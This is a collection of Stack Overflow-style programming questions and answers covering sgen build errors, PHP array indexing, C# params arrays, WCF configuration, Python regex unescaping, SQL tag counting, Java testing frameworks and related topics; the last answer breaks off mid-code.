/reference:C:\p4root\Zantaz\trunk\EASDiscovery\Quartz\src\Quartz\target\win_x32\release\results\Scheduler.dll /reference:c:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\System.configuration.dll /reference:c:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\System.Data.dll /reference:c:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\System.Design.dll /reference:c:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\System.DirectoryServices.dll /reference:c:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\System.dll /reference:c:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\System.Drawing.dll /reference:c:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\System.Web.dll /reference:c:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\System.Web.Services.dll 
/reference:c:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\System.Windows.Forms.dll /reference:c:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\System.Xml.dll /compiler:/delaysign- Error: The specified module could not be found. (Exception from HRESULT: 0x8007007E) C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\Microsoft.Common.targets(1902,9): error MSB6006: "sgen.exe" exited with code 1. ``` I changed the output directory to target/win\_x32/release/results but the path in sgen doesn't seem to have been updated. There seems to be no reference in the project to what path is passed into sgen so I'm unsure how to fix it. As a workaround I have disabled the serialization generation but it would be nice to fix the underlying problem. Has anybody else seen this?
see [msdn](http://msdn.microsoft.com/en-us/library/bk3w6240(VS.80).aspx) for the options to sgen.exe [you have the command line, you can play with it manually... delete your .XmlSerializers.dll or use /force though] Today I also ran across how to more [manually specify the sgen options](http://www.kiwidude.com/blog/2007/02/vs2005-when-sgen-doesnt-work.html). I wanted this to not use the /proxy switch, but it appears it can let you specify the output directory. I don't know enough about msbuild to make it awesome, but this should get you started [open your .csproj/.vbproj in your non-visual studio editor of choice, look at the bottom and you should be able to figure out how/where this goes] [the below code has had UseProxyTypes set to true for your convenience] ``` <Target Name="GenerateSerializationAssembliesForAllTypes" DependsOnTargets="AssignTargetPaths;Compile;ResolveKeySource" Inputs="$(MSBuildAllProjects);@(IntermediateAssembly)" Outputs="$(OutputPath)$(_SGenDllName)"> <SGen BuildAssemblyName="$(TargetFileName)" BuildAssemblyPath="$(OutputPath)" References="@(ReferencePath)" ShouldGenerateSerializer="true" UseProxyTypes="true" KeyContainer="$(KeyContainerName)" KeyFile="$(KeyOriginatorFile)" DelaySign="$(DelaySign)" ToolPath="$(SGenToolPath)"> <Output TaskParameter="SerializationAssembly" ItemName="SerializationAssembly" /> </SGen> </Target> <!-- <Target Name="BeforeBuild"> </Target> --> <Target Name="AfterBuild" DependsOnTargets="GenerateSerializationAssembliesForAllTypes"> </Target> ```
If you are having this problem while building your VS.NET project in Release mode, here is the solution: go to the project properties, click on the Build tab, and set the "Generate Serialization Assembly" dropdown to "Off". Per [MSDN](https://msdn.microsoft.com/en-us/library/bk3w6240%28v=vs.110%29.aspx), "The XML Serializer Generator creates an XML serialization assembly for types in a specified assembly in order to improve the startup performance of a XmlSerializer when it serializes or deserializes objects of the specified types."
sgen.exe fails during build
[ "", "c#", "visual-studio", "msbuild", "" ]
What is the difference, if any, between these methods of indexing into a PHP array: ``` $array[$index] $array["$index"] $array["{$index}"] ``` I'm interested in both the performance and functional differences. ### Update: (In response to @Jeremy) I'm not sure that's right. I ran this code: ``` $array = array(100, 200, 300); print_r($array); $idx = 0; $array[$idx] = 123; print_r($array); $array["$idx"] = 456; print_r($array); $array["{$idx}"] = 789; print_r($array); ``` And got this output: ``` Array ( [0] => 100 [1] => 200 [2] => 300 ) Array ( [0] => 123 [1] => 200 [2] => 300 ) Array ( [0] => 456 [1] => 200 [2] => 300 ) Array ( [0] => 789 [1] => 200 [2] => 300 ) ```
See @svec and @jeremy above. All array indices are of type 'int' first, then type 'string', and PHP will cast them as it sees fit. Performance-wise, $index should be faster than "$index" and "{$index}" (which are the same). Once you start a double-quoted string, PHP goes into interpolation mode and treats it as a string first, looking for variable markers ($, {}, etc.) to replace from the local scope. This is why in most discussions, truly 'static' strings should always use single quotes unless you need escape shortcuts like "\n" or "\t": PHP does not need to interpolate the string at runtime, so the full string can be compiled statically. In this case, double-quoting first copies $index into a new string and uses that as the key, whereas using $index directly just uses the value as the key.
I timed the 3 ways of using an index like this: ``` for ($ii = 0; $ii < 1000000; $ii++) { // TEST 1 $array[$idx] = $ii; // TEST 2 $array["$idx"] = $ii; // TEST 3 $array["{$idx}"] = $ii; } ``` The first set of tests used `$idx=0`, the second set used `$idx="0"`, and the third set used `$idx="blah"`. Timing was done using `microtime()` diffs. I'm using WinXP, PHP 5.2, Apache 2.2, and Vim. :-) And here are the results: ### Using `$idx = 0` ``` $array[$idx] // time: 0.45435905456543 seconds $array["$idx"] // time: 1.0537171363831 seconds $array["{$idx}"] // time: 1.0621709823608 seconds ratio "$idx" / $idx // 2.3191287282497 ratio "{$idx}" / $idx // 2.3377348193858 ``` ### Using `$idx = "0"` ``` $array[$idx] // time: 0.5107250213623 seconds $array["$idx"] // time: 0.77445602416992 seconds $array["{$idx}"] // time: 0.77329802513123 seconds ratio "$idx" / $idx // = 1.5163855142717 ratio "{$idx}" / $idx // = 1.5141181512285 ``` ### Using `$idx = "blah"` ``` $array[$idx] // time: 0.48077392578125 seconds $array["$idx"] // time: 0.73676419258118 seconds $array["{$idx}"] // time: 0.71499705314636 seconds ratio "$idx" / $idx // = 1.5324545551923 ratio "{$idx}" / $idx // = 1.4871793473086 ``` So `$array[$idx]` is the hands-down winner of the performance competition, at least on my machine. (The results were very repeatable, BTW, I ran it 3 or 4 times and got the same results.)
PHP array indexing: $array[$index] vs $array["$index"] vs $array["{$index}"]
[ "", "php", "syntax", "" ]
I have inherited some legacy PHP code that was written back when it was standard practice to use [`register_globals`](http://php.net/register_globals) (as of PHP 4.2.0, released 22 Apr 2002, this directive defaults to off). We know now that it is bad for security to have it enabled. The problem is: how do I find all the places in the code where I need to use `$_GET` or `$_POST`? My only thought was to set the error reporting to warn about uninitialized variables and then test each part of the site. Is there an easier way? Will I have to test each code path in the site or will PHP give a warning on a file basis?
If you set error reporting to E\_ALL, it warns in the error log about undefined variables, complete with filename and line number (assuming you are logging to a file). However, it will warn only when it comes across an undefined variable, so I think you will have to test each code path. Running PHP from the command line doesn't seem to help either. There is a debugging tool named xdebug; I haven't tried it, but maybe it can be useful?
I wrote a [script](http://pastebin.com/f6f379371) using the built-in [Tokenizer](http://au.php.net/manual/en/ref.tokenizer.php) functions. It's pretty rough, but it worked for the code base I was working on. I believe you could also use [CodeSniffer](http://pear.php.net/manual/en/package.php.php-codesniffer.php).
Making code work with register_globals turned off
[ "", "php", "register-globals", "" ]
I have a method which takes params object[] such as: ``` void Foo(params object[] items) { Console.WriteLine(items[0]); } ``` When I pass two object arrays to this method, it works fine: ``` Foo(new object[]{ (object)"1", (object)"2" }, new object[]{ (object)"3", (object)"4" } ); // Output: System.Object[] ``` But when I pass a single object[], it does not take my object[] as the first param, instead it takes its all elements like I wanted to pass them one by one: ``` Foo(new object[]{ (object)"1", (object)"2" }); // Output: 1, expected: System.Object[] ``` How do I pass a single object[] as a first argument to a params array?
A simple typecast will ensure the compiler knows what you mean in this case. ``` Foo((object)new object[]{ (object)"1", (object)"2" }); ``` As an array is a subtype of object, this all works out. Bit of an odd solution though, I'll agree.
The `params` parameter modifier gives callers a shortcut syntax for passing multiple arguments to a method. There are two ways to call a method with a `params` parameter: **1)** Calling with an array of the parameter type, in which case the `params` keyword has no effect and the array is passed directly to the method: ``` object[] array = new[] { "1", "2" }; // Foo receives the 'array' argument directly. Foo( array ); ``` **2)** Or, calling with an extended list of arguments, in which case the compiler will automatically wrap the list of arguments in a temporary array and pass that to the method: ``` // Foo receives a temporary array containing the list of arguments. Foo( "1", "2" ); // This is equivalent to: object[] temp = new[] { "1", "2" }; Foo( temp ); ``` In order to pass in an object array to a method with a "`params object[]`" parameter, you can either: **1)** Create a wrapper array manually and pass that directly to the method, as mentioned by [lassevk](https://stackoverflow.com/questions/36350/c-how-to-pass-a-single-object-to-a-params-object#36360): ``` Foo( new object[] { array } ); // Equivalent to calling convention 1. ``` **2)** Or, cast the argument to `object`, as mentioned by [Adam](https://stackoverflow.com/questions/36350/c-how-to-pass-a-single-object-to-a-params-object#36367), in which case the compiler will create the wrapper array for you: ``` Foo( (object)array ); // Equivalent to calling convention 2. ``` However, if the goal of the method is to process multiple object arrays, it may be easier to declare it with an explicit "`params object[][]`" parameter. This would allow you to pass multiple arrays as arguments: ``` void Foo( params object[][] arrays ) { foreach( object[] array in arrays ) { // process array } } ... 
Foo( new[] { "1", "2" }, new[] { "3", "4" } ); // Equivalent to: object[][] arrays = new[] { new[] { "1", "2" }, new[] { "3", "4" } }; Foo( arrays ); ``` --- **Edit:** Raymond Chen describes this behavior and how it relates to the C# specification in [a new post](https://devblogs.microsoft.com/oldnewthing/20130806-00/?p=3603).
How to pass a single object[] to a params object[]
[ "", "c#", "arrays", "" ]
I've been working with [providers](http://msdn.microsoft.com/en-us/library/aa479030.aspx) a fair bit lately, and I came across an interesting situation where I wanted to have an abstract class that had an `abstract static` method. I read a few posts on the topic, and it sort of made sense, but is there a nice clear explanation?
Static methods are not *instantiated* as such, they're just available without an object reference. A call to a static method is done through the class name, not through an object reference, and the Intermediate Language (IL) code to call it will call the abstract method through the name of the class that defined it, not necessarily the name of the class you used. Let me show an example. With the following code: ``` public class A { public static void Test() { } } public class B : A { } ``` If you call B.Test, like this: ``` class Program { static void Main(string[] args) { B.Test(); } } ``` Then the actual code inside the Main method is as follows: ``` .entrypoint .maxstack 8 L0000: nop L0001: call void ConsoleApplication1.A::Test() L0006: nop L0007: ret ``` As you can see, the call is made to A.Test, because it was the A class that defined it, and not to B.Test, even though you can write the code that way. If you had *class types*, like in the Delphi Programming Language, where you can make a variable referring to a type and not an object, you would have more use for virtual and thus abstract static methods (and also constructors), but they aren't available and thus static calls are non-virtual in .NET. I realize that the IL designers could allow the code to be compiled to call B.Test, and resolve the call at runtime, but it still wouldn't be virtual, as you would still have to write some kind of class name there. Virtual methods, and thus abstract ones, are only useful when you're using a variable which, at runtime, can contain many different types of objects, and you thus want to call the right method for the current object you have in the variable. With static methods you need to go through a class name anyway, so the exact method to call is known at compile time because it can't and won't change. Thus, virtual/abstract static methods are not available in .NET.
Static methods cannot be inherited or overridden, and that is why they can't be abstract. Since static methods are defined on the type, not the instance, of a class, they must be called explicitly on that type. So when you want to call a method on a child class, you need to use its name to call it. This makes inheritance irrelevant. Assume you could, for a moment, inherit static methods. Imagine this scenario: ``` public static class Base { public static virtual int GetNumber() { return 5; } } public static class Child1 : Base { public static override int GetNumber() { return 1; } } public static class Child2 : Base { public static override int GetNumber() { return 2; } } ``` If you call Base.GetNumber(), which method would be called? Which value returned? It's pretty easy to see that without creating instances of objects, inheritance is rather hard. Abstract methods without inheritance are just methods that don't have a body, so can't be called.
Why can't I have abstract static methods in C#?
[ "", "c#", ".net", "language-design", "" ]
I have a .exe and many plug-in .dll modules that the .exe loads. (I have source for both.) A cross-platform (with source) solution would be ideal, but the platform can be narrowed to WinXP and Visual Studio (7.1/2003 in my case). The built-in VS leak detector only gives the line where new/malloc was called from, but I have a wrapper for allocations, so a full symbolic stack trace would be best. The detector would also be able to detect for a leak in both the .exe and its accompanying plug-in .dll modules.
I personally use [Visual Leak Detector](https://kinddragon.github.io/vld/), though it can cause large delays when large blocks are leaked (it displays the contents of the entire leaked block).
If you don't want to recompile (as Visual Leak Detector requires) I would recommend [WinDbg](https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/debugger-download-tools), which is both powerful and fast (though it's not as easy to use as one could desire). On the other hand, if you don't want to mess with WinDbg, you can take a look at [UMDH](http://msdn.microsoft.com/en-us/library/ff560206%28VS.85%29.aspx), which is also developed by Microsoft and it's easier to learn. Take a look at these links in order to learn more about WinDbg, memory leaks and memory management in general: * [Memory Leak Detection Using Windbg](http://www.codeproject.com/KB/cpp/MemoryLeak.aspx) * [Memory Leak Detection in MFC](http://msdn.microsoft.com/en-us/library/c99kz476%28VS.80%29.aspx) * [Common WinDbg Commands (Thematically Grouped)](http://windbg.info/doc/1-common-cmds.html#20_memory_heap) * [C/C++ Memory Corruption And Memory Leaks](http://www.yolinux.com/TUTORIALS/C++MemoryCorruptionAndMemoryLeaks.html) * [The Memory Management Reference](http://www.memorymanagement.org/) * [Using LeakDiag to Debug Unmanaged Memory Leaks](http://mcfunley.com/277/using-leakdiag-to-debug-unmanaged-memory-leaks) * [Heap: Pleasures and Pains](http://msdn.microsoft.com/en-us/library/ms810466.aspx)
What is the best free memory leak detector for a C/C++ program and its plug-in DLLs?
[ "", "c++", "c", "visual-studio", "memory-leaks", "" ]
Ok, so PHP isn't the best language to be dealing with arbitrarily large integers in, considering that it only natively supports 32-bit signed integers. What I'm trying to do though is create a class that could represent an arbitrarily large binary number and be able to perform simple arithmetic operations on two of them (add/subtract/multiply/divide). My target is dealing with 128-bit integers. There's a couple of approaches I'm looking at, and problems I see with them. Any input or commentary on what you would choose and how you might go about it would be greatly appreciated. **Approach #1:** Create a 128-bit integer class that stores its integer internally as four 32-bit integers. The only problem with this approach is that I'm not sure how to go about handling overflow/underflow issues when manipulating individual chunks of the two operands. **Approach #2:** Use the bcmath extension, as this looks like something it was designed to tackle. My only worry in taking this approach is the scale setting of the bcmath extension, because there can't be any rounding errors in my 128-bit integers; they must be precise. I'm also worried about being able to eventually convert the result of the bcmath functions into a binary string (which I'll later need to shove into some mcrypt encryption functions). **Approach #3:** Store the numbers as binary strings (probably LSB first). Theoretically I should be able to store integers of any arbitrary size this way. All I would have to do is write the four basic arithmetic functions to perform add/sub/mult/div on two binary strings and produce a binary string result. This is exactly the format I need to hand over to mcrypt as well, so that's an added plus. This is the approach I think has the most promise at the moment, but the one sticking point I've got is that PHP doesn't offer me any way to manipulate the individual bits (that I know of). 
I believe I'd have to break it up into byte-sized chunks (no pun intended), at which point my questions about handling overflow/underflow from Approach #1 apply.
The [PHP GMP extension](https://www.php.net/gmp) will be better for this. As an added bonus, you can use it to do your decimal-to-binary conversion, like so: ``` gmp_strval(gmp_init($n, 10), 2); ```
There are already various [classes](http://www.pear.php.net/package/Crypt_DiffieHellman/docs/latest/Crypt_DiffieHellman/BigInteger/Crypt_DiffieHellman_Math_BigInteger_Interface.html) [available](http://pear.php.net/package/Math_BigInteger/docs/latest/Math_BigInteger/_Math_BigInteger-1.0.0RC3---BigInteger.php.html) for this so you may wish to look at them before writing your own solution (if indeed writing your own solution is still needed).
Arithmetic with Arbitrarily Large Integers in PHP
[ "", "php", "integer", "" ]
Using C# .NET 3.5 and WCF, I'm trying to write out some of the WCF configuration in a client application (the name of the server the client is connecting to). The obvious way is to use `ConfigurationManager` to load the configuration section and write out the data I need. ``` var serviceModelSection = ConfigurationManager.GetSection("system.serviceModel"); ``` Appears to always return null. ``` var serviceModelSection = ConfigurationManager.GetSection("appSettings"); ``` Works perfectly. The configuration section is present in the App.config but for some reason `ConfigurationManager` refuses to load the `system.ServiceModel` section. I want to avoid manually loading the xxx.exe.config file and using XPath but if I have to resort to that I will. Just seems like a bit of a hack. Any suggestions?
The [`<system.serviceModel>`](http://msdn.microsoft.com/en-us/library/ms731354%28v=vs.90%29.aspx) element is for a configuration section **group**, not a section. You'll need to use [`System.ServiceModel.Configuration.ServiceModelSectionGroup.GetSectionGroup()`](http://msdn.microsoft.com/en-us/library/system.servicemodel.configuration.servicemodelsectiongroup.getsectiongroup%28v=vs.90%29.aspx) to get the whole group.
<http://mostlytech.blogspot.com/2007/11/programmatically-enumerate-wcf.html> ``` // Automagically find all client endpoints defined in app.config ClientSection clientSection = ConfigurationManager.GetSection("system.serviceModel/client") as ClientSection; ChannelEndpointElementCollection endpointCollection = clientSection.ElementInformation.Properties[string.Empty].Value as ChannelEndpointElementCollection; List<string> endpointNames = new List<string>(); foreach (ChannelEndpointElement endpointElement in endpointCollection) { endpointNames.Add(endpointElement.Name); } // use endpointNames somehow ... ``` Appears to work well.
Loading System.ServiceModel configuration section using ConfigurationManager
[ "", "c#", ".net", "xml", "wcf", "configurationmanager", "" ]
I am trying to implement string unescaping with Python regex and backreferences, and it doesn't seem to want to work very well. I'm sure it's something I'm doing wrong but I can't figure out what... ``` >>> import re >>> mystring = r"This is \n a test \r" >>> p = re.compile( "\\\\(\\S)" ) >>> p.sub( "\\1", mystring ) 'This is n a test r' >>> p.sub( "\\\\\\1", mystring ) 'This is \\n a test \\r' >>> p.sub( "\\\\1", mystring ) 'This is \\1 a test \\1' ``` I'd like to replace \\[char] with \[char], but backreferences in Python don't appear to follow the same rules they do in every other implementation I've ever used. Could someone shed some light?
Isn't that what Anders' second example does? In 2.5 there's also a `string-escape` encoding you can apply: ``` >>> mystring = r"This is \n a test \r" >>> mystring.decode('string-escape') 'This is \n a test \r' >>> print mystring.decode('string-escape') This is a test >>> ```
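For readers on Python 3 (where `str` no longer has a `.decode()` method), a rough equivalent of the `string-escape` codec is `unicode_escape`. A sketch, with the caveat that `unicode_escape` assumes latin-1 for non-ASCII characters, so it is only a safe drop-in for ASCII input:

```python
import codecs

mystring = r"This is \n a test \r"

# Python 3 stand-in for mystring.decode('string-escape'); the
# 'unicode_escape' codec interprets the backslash escapes, so the
# result contains real newline / carriage-return characters.
unescaped = codecs.decode(mystring, "unicode_escape")
print(repr(unescaped))
```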
Well, I think you might have missed the r or miscounted the backslashes... ``` "\\n" == r"\n" >>> import re >>> mystring = r"This is \\n a test \\r" >>> p = re.compile( r"[\\][\\](.)" ) >>> print p.sub( r"\\\1", mystring ) This is \n a test \r >>> ``` Which, if I understood, is what was requested. I suspect the more common request is this: ``` >>> d = {'n':'\n', 'r':'\r', 'f':'\f'} >>> p = re.compile(r"[\\]([nrfv])") >>> print p.sub(lambda mo: d[mo.group(1)], mystring) This is \ a test \ >>> ``` The interested student should also read Ken Thompson's ["Reflections on Trusting Trust"](http://cm.bell-labs.com/who/ken/trust.html), wherein our hero uses a similar example to explain the perils of trusting compilers you haven't bootstrapped from machine code yourself.
Python Regular Expressions to implement string unescaping
[ "", "python", "regex", "backreference", "" ]
At work we are currently still using JUnit 3 to run our tests. We have been considering switching over to JUnit 4 for **new** tests being written but I have been keeping an eye on TestNG for a while now. What experiences have you all had with either JUnit 4 or TestNG, and which seems to work better for very large numbers of tests? Having flexibility in writing tests is also important to us since our functional tests cover a wide aspect and need to be written in a variety of ways to get results. Old tests will not be re-written as they do their job just fine. What I would like to see in new tests though is flexibility in the way the test can be written, natural assertions, grouping, and easily distributed test executions.
I've used both, but I have to agree with Justin Standard that you shouldn't really consider rewriting your existing tests to any new format. Regardless of the decision, it is pretty trivial to run both. TestNG strives to be much more configurable than JUnit, but in the end they both work equally well. TestNG has a neat feature where you can mark tests as a particular group, and then easily run all tests of a specific group, or exclude tests of a particular group. Thus you can mark tests that run slowly as being in the "slow" group and then ignore them when you want quick results. A suggestion from their documentation is to mark some subset as "checkin" tests which should be run whenever you check new files in. I never saw such a feature in JUnit, but then again, if you don't have it, you don't REALLY miss it. For all its claims of high configuration, I did run into a corner case a couple of weeks ago where I couldn't do what I wanted to do... I wish I could remember what it was, but I wanted to bring it up so you know that it's not perfect. The biggest advantage TestNG has is annotations... which JUnit added in version 4 anyways.
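The group-filtering idea is easy to picture. Below is a hedged, stdlib-only sketch of the mechanism using a made-up `@Group` annotation and reflection; it illustrates the concept, and is not TestNG's actual API or runner:

```java
import java.lang.annotation.*;
import java.lang.reflect.Method;
import java.util.*;

// Illustration only: a hypothetical @Group annotation plus a reflection
// filter, mimicking how a runner could select the tests in a named group.
class GroupDemo {
    @Retention(RetentionPolicy.RUNTIME)
    @Target(ElementType.METHOD)
    @interface Group { String value(); }

    static class MyTests {
        @Group("fast") public void quickCheck() {}
        @Group("slow") public void fullIntegration() {}
        @Group("fast") public void anotherQuickCheck() {}
    }

    static List<String> methodsInGroup(Class<?> testClass, String group) {
        List<String> names = new ArrayList<>();
        for (Method m : testClass.getDeclaredMethods()) {
            Group g = m.getAnnotation(Group.class);
            if (g != null && g.value().equals(group)) names.add(m.getName());
        }
        Collections.sort(names); // reflection does not guarantee declaration order
        return names;
    }

    public static void main(String[] args) {
        // Run only the "fast" group, skipping the slow tests.
        System.out.println(methodsInGroup(MyTests.class, "fast"));
    }
}
```

TestNG's real version of this is driven by `groups` attributes on its annotations plus include/exclude configuration, but the selection principle is the same.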
First I would say, don't rewrite all your tests just to suit the latest fad. Junit3 works perfectly well, and the introduction of annotations in 4 doesn't buy you very much (in my opinion). It is much more important that you guys *write* tests, and it sounds like you do. Use whatever seems most natural and helps you get your work done. I can't comment on TestNG b/c I haven't used it. But I would recommend [unitils](http://www.unitils.org/summary.html), a great wrapper for JUnit/TestNG/DBUnit/EasyMock, regardless of which route you take. (It supports all the flavors mentioned above)
JUnit vs TestNG
[ "", "java", "testing", "junit", "testng", "" ]
My job would be easier, or at least less tedious if I could come up with an automated way (preferably in a Python script) to extract useful information from a FileMaker Pro database. I am working on Linux machine and the FileMaker database is on the same LAN running on an OS X machine. I can log into the webby interface from my machine. I'm quite handy with SQL, and if somebody could point me to some FileMaker plug-in that could give me SQL access to the data within FileMaker, I would be pleased as punch. Everything I've found only goes the other way: Having FileMaker get data from SQL sources. Not useful. It's not my first choice, but I'd use Perl instead of Python if there was a Perl-y solution at hand. *Note*: XML/XSLT services (as suggested by some folks) are only available on FM Server, not FM Pro. Otherwise, that would probably be the best solution. ODBC is turning out to be extremely difficult to even get working. There is absolutely zero feedback from FM when you set it up so you have to dig through /var/log/system.log and parse obscure error messages. *Conclusion*: I got it working by running a python script locally on the machine that queries the FM database through the ODBC connections. The script is actually a TCPServer that accepts socket connections from other systems on the LAN, runs the queries, and returns the data through the socket connection. I had to do this to bypass the fact that FM Pro only accepts ODBC connections locally (FM server is required for external connections).
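The relay described in the conclusion can be sketched roughly like this (Python 3 module names; the ODBC call itself is stubbed out, since the real query function depends on the local driver setup):

```python
import socket
import socketserver
import threading

def run_query(sql):
    # Placeholder for the local ODBC call to FileMaker Pro -- in the real
    # script this is where the query is executed against the database.
    return "RESULT: " + sql

class QueryHandler(socketserver.StreamRequestHandler):
    # One query per line in, one result line back out.
    def handle(self):
        sql = self.rfile.readline().decode("utf-8").strip()
        self.wfile.write((run_query(sql) + "\n").encode("utf-8"))

def start_server(host="127.0.0.1", port=0):
    # port=0 picks a free port; a real deployment would use a fixed one
    # and bind to the LAN interface instead of loopback.
    server = socketserver.TCPServer((host, port), QueryHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server

def ask(port, sql):
    # What a client elsewhere on the LAN would do.
    with socket.create_connection(("127.0.0.1", port)) as conn:
        conn.sendall((sql + "\n").encode("utf-8"))
        return conn.makefile().readline().strip()
```

Usage: `server = start_server()` on the OS X machine, then `ask(port, "SELECT ...")` from the Linux box. This works around FM Pro only accepting ODBC connections locally.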
It has been a **really** long time since I did anything with FileMaker Pro, but I know that it does have capabilities for an ODBC (and JDBC) connection to be made to it (however, I don't know how, or if, that translates to the Linux/Perl/Python world). This article shows how to share/expose your FileMaker data via ODBC & JDBC: [Sharing FileMaker Pro data via ODBC or JDBC](http://www.filemaker.com/help/15-Using%20ODBC2.html) From there, if you're able to create an ODBC/JDBC connection you could query out data as needed.
You'll need the FileMaker Pro installation CD to get the drivers. [This document](http://www.filemaker.com/downloads/pdf/fm9_odbc_jdbc_guide_en.pdf) details the process for FMP 9 - it is similar for versions 7.x and 8.x as well. Versions 6.x and earlier are completely different and I wouldn't bother trying (xDBC support in those previous versions is "minimal" at best). FMP 9 supports SQL-92 standard syntax (mostly). Note that rather than querying tables directly you query using the "table occurrence" name which serves as a table alias of sorts. If the data tables are stored in multiple files it is possible to create a single FMP file with table occurrences/aliases pointing to those data tables. There's an "undocumented feature" where such a file must have a table defined in it as well and that table "related" to any other table on the relationships graph (doesn't matter which one) for ODBC access to work. Otherwise your queries will always return no results. The PDF document details all of the limitations of using the xDBC interface FMP provides. Performance of simple queries is reasonably fast, ymmv. I have found the performance of queries specifying the "LIKE" operator to be less than stellar. FMP also has an XML/XSLT interface that you can use to query FMP data over an HTTP connection. It also provides a PHP class for accessing and using FMP data in web applications.
Best way to extract data from a FileMaker Pro database in a script?
[ "", "python", "linux", "perl", "scripting", "filemaker", "" ]
Let's say I have four tables: `PAGE`, `USER`, `TAG`, and `PAGE-TAG`: ``` Table | Fields ------------------------------------------ PAGE | ID, CONTENT TAG | ID, NAME USER | ID, NAME PAGE-TAG | ID, PAGE-ID, TAG-ID, USER-ID ``` And let's say I have four pages: ``` PAGE#1 'Content page 1' tagged with tag#1 by user1, tagged with tag#1 by user2 PAGE#2 'Content page 2' tagged with tag#3 by user2, tagged with tag#1 by user2, tagged with tag#8 by user1 PAGE#3 'Content page 3' tagged with tag#7 by user1 PAGE#4 'Content page 4' tagged with tag#1 by user1, tagged with tag#8 by user1 ``` I expect my query to look something like this: ``` select page.content ? from page, page-tag where page.id = page-tag.page-id and page-tag.tag-id in (1, 3, 8) order by ? desc ``` I would like to get output like this: ``` Content page 2, 3 Content page 4, 2 Content page 1, 1 ``` --- Quoting Neall > Your question is a bit confusing. Do you want to get the number of times each page has been tagged? No > The number of times each page has gotten each tag? No > The number of unique users that have tagged a page? No > The number of unique users that have tagged each page with each tag? No I want to know how many of the passed tags appear in a particular page, not just whether any of the tags appear. SQL IN works like a boolean OR operator: if a page was tagged with any value within the IN clause then it returns true. I would like to know how many of the values inside of the IN clause return true.
Below I show the output I expect: ``` page 1 | in (1,2) -> 1 page 1 | in (1,2,3) -> 1 page 1 | in (1) -> 1 page 1 | in (1,3,8) -> 1 page 2 | in (1,2) -> 1 page 2 | in (1,2,3) -> 2 page 2 | in (1) -> 1 page 2 | in (1,3,8) -> 3 page 4 | in (1,2) -> 1 page 4 | in (1,2,3) -> 1 page 4 | in (1) -> 1 page 4 | in (1,3,8) -> 2 ``` This will be the content of the page-tag table I mentioned before: ``` id page-id tag-id user-id 1 1 1 1 2 1 1 2 3 2 3 2 4 2 1 2 5 2 8 1 6 3 7 1 7 4 1 1 8 4 8 1 ``` **@Kristof** That is not exactly what I am searching for, but thanks anyway. **@Daren** If I execute your code I get the following error: ``` #1054 - Unknown column 'page-tag.tag-id' in 'having clause' ``` **@Eduardo Molteni** Your answer does not give the output in the question but: ``` Content page 2 8 Content page 4 8 content page 2 3 content page 1 1 content page 1 1 content page 2 1 content page 4 1 ``` **@Keith** I am using plain SQL, not T-SQL, and I am not familiar with T-SQL, so I do not know how your query translates to plain SQL. Any more ideas?
OK, so the key difference between this and kristof's answer is that you only want a count of 1 to show against page 1, because it has been tagged only with one tag from the set (even though two separate users both tagged it). I would suggest this: ``` SELECT t.ID, t.content, count(*) AS uniquetags FROM ( SELECT DISTINCT page.content, page.ID, page-tag.tag-id FROM page INNER JOIN page-tag ON page.ID=page-tag.page-ID WHERE page-tag.tag-id IN (1, 3, 8) ) AS t GROUP BY t.ID, t.content ``` Note that the derived table needs an alias (`AS t` here) in SQL Server. I don't have a SQL Server installation to check this, so apologies if there's a syntax mistake. But semantically I think this is what you need. This may not give the output in descending order of number of tags, but try adding: ``` ORDER BY uniquetags DESC ``` at the end. My uncertainty is whether you can use `ORDER BY` outside of grouping in SQL Server. If not, then you may need to nest the whole thing in another `SELECT`.
This might work: ``` select page.content, count(page-tag.tag-id) as tagcount from page inner join page-tag on page-tag.page-id = page.id group by page.content having page-tag.tag-id in (1, 3, 8) ```
How can I get the number of occurrences in a SQL IN clause?
[ "", "sql", "" ]
I have a recursive algorithm which steps through a string, character by character, and parses it to create a tree-like structure. I want to be able to keep track of the character index the parser is currently at (for error messages as much as anything else) but am not keen on implementing something like a tuple to handle multiple returned types. I tried using an Integer type, declared outside the method and passed into the recursive method, but because it's final, recursive call increments are "forgotten" when I return. (Because the increment of the Integer value makes the passed-by-value object reference point at a new object) Is there a way to get something similar to work which won't pollute my code?
Since you've already discovered the pseudo-mutable integer "hack," how about this option: Does it make sense for you to make a separate Parser class? If you do this, you can store the current state in a member variable. You probably need to think about how you're going to handle any thread safety issues, and it might be overkill for this particular application, but it might work for you.
It's kind of a hack, but sometimes I use an AtomicInteger, which is mutable, to do things like this. I've also seen cases where an int[] of size 1 is passed in.
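To make the int[]-of-size-1 trick concrete, here is a sketch applied to the question's scenario; the nested-parentheses "grammar" is invented purely for illustration:

```java
class CharCounter {
    // Recursively walks a nested-parentheses string starting at pos[0],
    // advancing the shared index as it goes. The increments survive the
    // recursion because the array object itself is shared, even though
    // the reference to it stays effectively final.
    public static void walk(String s, int[] pos) {
        while (pos[0] < s.length()) {
            char c = s.charAt(pos[0]);
            pos[0]++;                 // consume the character
            if (c == '(') {
                walk(s, pos);         // recurse into the nested group
            } else if (c == ')') {
                return;               // end of this group
            }
        }
    }
}
```

On an error, `pos[0]` holds exactly the character index the parser reached, which is what the question needs for error messages.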
How to keep a "things done" count in a recursive algorithm in Java?
[ "", "java", "recursion", "coding-style", "integer", "final", "" ]
I'm using `ByteBuffers` and `FileChannels` to write binary data to a file. When doing that for big files or successively for multiple files, I get an `OutOfMemoryError` exception. I've read elsewhere that using `Bytebuffers` with NIO is broken and should be avoided. Does any of you already faced this kind of problem and found a solution to efficiently save large amounts of binary data in a file in java? Is the jvm option `-XX:MaxDirectMemorySize` the way to go?
I would say don't create a huge ByteBuffer that contains ALL of the data at once. Create a much smaller ByteBuffer, fill it with data, then write this data to the FileChannel. Then reset the ByteBuffer and continue until all the data is written.
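A minimal sketch of that chunked approach; the file name and chunk size are arbitrary assumptions, not from the question:

```java
import java.io.FileOutputStream;
import java.io.IOException;
import java.nio.ByteBuffer;
import java.nio.channels.FileChannel;

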